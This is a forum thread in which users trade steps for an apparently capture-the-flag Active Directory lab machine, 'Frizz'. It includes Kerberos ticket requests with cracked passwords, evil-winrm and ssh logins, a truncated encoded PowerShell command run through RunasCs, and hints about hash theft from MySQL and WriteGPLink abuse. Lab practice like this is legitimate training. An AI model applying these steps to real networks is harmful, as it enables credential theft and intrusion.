Posts: 49
Threads: 0
Joined: Dec 2024
Mar 15, 2025, 11:25 PM
(This post was last modified: Mar 15, 2025, 11:27 PM by 0xbeef.)
(Mar 15, 2025, 11:20 PM)potato_moose Wrote: any help with the right commands chain to make evil-winrm working?
make sure you changed the `/etc/krb5.conf` and also you exported the ticket
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S : On public instance this lacking...
But once you have the ticket you can also access ssh since it's open using the same ticket
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. Im used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
i also tried these man
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys use the user and cracked password with impacket-getTGT to get a ticket then use ssh f.frizzle@10.10.11.60
bro i got the f.frizzle.ccache but still getting errors
real errors
Did you change the time, the clock was badly skewed
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 22
Threads: 0
Joined: Jan 2025
anything for root? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 33
Threads: 1
Joined: Oct 2024
(Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: any help with the right commands chain to make evil-winrm working?
make sure you changed the `/etc/krb5.conf` and also you exported the ticket
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S : On public instance this lacking...
But once you have the ticket you can also access ssh since it's open using the same ticket
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. Im used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
i also tried these man
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys use the user and cracked password with impacket-getTGT to get a ticket then use ssh f.frizzle@10.10.11.60
bro i got the f.frizzle.ccache but still getting errors
real errors
Did you change the time, the clock was badly skewed
i get f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive). for ssh and evil-winrm doesnt even connect
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
Posts: 17
Threads: 0
Joined: Jan 2025
(Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: where did you guys find the hash to crack? if it's not too dumb of a question
From roasting I'm guessing, but my instance doesn't seem too fond of that...
Posts: 24
Threads: 2
Joined: Jun 2024
(Mar 15, 2025, 11:36 PM)arrogantoverlord Wrote: (Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: where did you guys find the hash to crack? if it's not too dumb of a question
From roasting I'm guessing, but my instance doesn't seem too fond of that...
From mysql database.
Posts: 17
Threads: 0
Joined: Jan 2025
(Mar 15, 2025, 11:41 PM)wh1t3_r4bb1t Wrote: (Mar 15, 2025, 11:36 PM)arrogantoverlord Wrote: (Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: where did you guys find the hash to crack? if it's not too dumb of a question
From roasting I'm guessing, but my instance doesn't seem too fond of that...
From mysql database.
Gotcha, I'm guessing it's where the not dummy admin hash is supposed to be...I'll look around, thanks
Posts: 49
Threads: 0
Joined: Dec 2024
(Mar 15, 2025, 11:34 PM)kyakeiuwu Wrote: (Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: any help with the right commands chain to make evil-winrm working?
make sure you changed the `/etc/krb5.conf` and also you exported the ticket
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S : On public instance this lacking...
But once you have the ticket you can also access ssh since it's open using the same ticket
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. Im used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
i also tried these man
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys use the user and cracked password with impacket-getTGT to get a ticket then use ssh f.frizzle@10.10.11.60
bro i got the f.frizzle.ccache but still getting errors
real errors
Did you change the time, the clock was badly skewed
i get f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive). for ssh and evil-winrm doesnt even connect
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
Try them on a private instance using release arena vpn, the regular ones seem problematic also make sure you updated your `/etc/krb5.conf` file This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 5
Threads: 0
Joined: Apr 2024
Mar 15, 2025, 11:59 PM
(This post was last modified: Mar 16, 2025, 12:03 AM by AbsolutelyMadProc.)
There's a 7z file in Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLInk perms over Class_FRIZZ and DOMAIN CONTROLLERS. Haven't looked into exploitation yet
Posts: 49
Threads: 0
Joined: Dec 2024
(Mar 15, 2025, 11:59 PM)AbsolutelyMadProc Wrote: There's a 7z file in Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLInk perms over Class_FRIZZ which contains v.fizzle. Haven't looked into exploitation yet
I can't access that directory for some reasons, can you share the pass ? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 42
Threads: 1
Joined: Oct 2024
(Mar 15, 2025, 11:55 PM)0xbeef Wrote: (Mar 15, 2025, 11:34 PM)kyakeiuwu Wrote: (Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: any help with the right commands chain to make evil-winrm working?
make sure you changed the `/etc/krb5.conf` and also you exported the ticket
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S : On public instance this lacking...
But once you have the ticket you can also access ssh since it's open using the same ticket
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. Im used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
i also tried these man
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys use the user and cracked password with impacket-getTGT to get a ticket then use ssh f.frizzle@10.10.11.60
bro i got the f.frizzle.ccache but still getting errors
real errors
Did you change the time, the clock was badly skewed
i get f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive). for ssh and evil-winrm doesnt even connect
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
Try them on a private instance using release arena vpn, the regular ones seem problematic also make sure you updated your `/etc/krb5.conf` file
Yeah, that worked for me!
Awkward public machines....
|
